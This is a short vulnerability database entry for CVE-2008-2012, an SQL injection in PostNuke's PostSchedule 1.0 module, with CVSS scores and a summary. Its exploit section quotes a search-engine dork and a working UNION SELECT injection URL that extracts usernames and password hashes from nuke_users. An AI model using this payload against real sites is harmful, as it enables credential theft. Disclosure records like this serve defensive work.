7.5
CVSSv2

CVE-2008-2012

Published: 30/04/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote malicious users to execute arbitrary SQL commands via the eid parameter in an event action.

Vulnerable Product Search on Vulmon Subscribe to Product

postnuke software foundation postschedule 1.0

Exploits

Vuln: Postnuke Mod PostSchedule SQL Vuln Author: Vuln search Kacper (kacper1964_at_yahoopl) google:"PostSchedule ver 1" Vuln: indexphp?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/* $Severo: Moga byc rozne tabele np pn_us ...